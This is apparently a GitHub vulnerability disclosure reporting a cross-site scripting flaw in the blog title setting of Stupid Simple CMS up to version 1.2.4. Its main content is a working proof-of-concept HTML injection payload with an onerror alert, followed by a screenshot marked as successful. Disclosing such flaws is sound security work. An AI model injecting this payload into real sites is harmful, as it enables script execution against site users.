cms/3.md at main · Xin246/cms · GitHub

product： Stupid Simple CMS ( Blogger )

download link： https://github.com/codelyfe/Stupid-Simple-CMS

version：<=1.2.4

There is Cross-Site Scripting (XSS) vulnerability within the blog title of the settings.

poc:

 "><img src=1 onerror=alert(1)> 

successed

![2](https://github.com/Xin246/cms/assets/160984304/027d9d2d-dd46-4467-b5d2-6ca2b578f762)